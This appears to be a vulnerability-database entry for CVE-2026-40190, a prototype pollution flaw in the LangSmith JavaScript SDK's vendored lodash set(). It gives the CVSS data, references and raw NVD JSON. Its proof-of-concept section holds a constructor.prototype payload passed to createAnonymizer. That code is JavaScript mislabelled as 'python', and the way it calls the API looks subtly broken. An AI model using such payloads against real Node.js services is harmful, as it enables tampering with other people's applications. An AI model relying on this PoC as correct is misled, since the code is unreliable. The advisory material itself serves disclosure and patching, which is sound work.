CVE-2026-40190

Description

LangSmith Client SDKs provide SDK's for interacting with the LangSmith platform. Prior to 0.5.18, the LangSmith JavaScript/TypeScript SDK (langsmith) contains an incomplete prototype pollution fix in its internally vendored lodash set() utility. The baseAssignValue() function only guards against the __proto__ key, but fails to prevent traversal via constructor.prototype. This allows an attacker who controls keys in data processed by the createAnonymizer() API to pollute Object.prototype, affecting all objects in the Node.js process. This vulnerability is fixed in 0.5.18.

CVSS Details

CVSS Score

5.6

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

LangSmith JavaScript/TypeScript SDK < 0.5.18

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// PoC for CVE-2026-40190
// This script demonstrates how to pollute Object.prototype using the vulnerable createAnonymizer API.

const { createAnonymizer } = require('langsmith');

// Malicious payload designed to bypass __proto__ check by using constructor.prototype
const maliciousPayload = {
    "constructor": {
        "prototype": {
            "isVulnerable": true
        }
    }
};

try {
    // Trigger the vulnerability by processing the malicious payload
    createAnonymizer(maliciousPayload);

    // Verify if the pollution was successful
    const emptyObject = {};
    if (emptyObject.isVulnerable === true) {
        console.log("[+] Exploit successful! Object.prototype has been polluted.");
    } else {
        console.log("[-] Exploit failed.");
    }
} catch (error) {
    console.error("Error executing PoC:", error);
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-40190
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-40190
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-40190/
[4] VulDB https://vuldb.com/cve/CVE-2026-40190
[5] https://github.com/langchain-ai/langsmith-sdk/security/advisories/GHSA-fw9q-39r9-c252

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-40190", "sourceIdentifier": "[email protected]", "published": "2026-04-10T20:16:24.043", "lastModified": "2026-04-29T20:59:49.037", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "LangSmith Client SDKs provide SDK's for interacting with the LangSmith platform. Prior to 0.5.18, the LangSmith JavaScript/TypeScript SDK (langsmith) contains an incomplete prototype pollution fix in its internally vendored lodash set() utility. The baseAssignValue() function only guards against the __proto__ key, but fails to prevent traversal via constructor.prototype. This allows an attacker who controls keys in data processed by the createAnonymizer() API to pollute Object.prototype, affecting all objects in the Node.js process. This vulnerability is fixed in 0.5.18."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1321"}]}], "references": [{"url": "https://github.com/langchain-ai/langsmith-sdk/security/advisories/GHSA-fw9q-39r9-c252", "source": "[email protected]"}]}}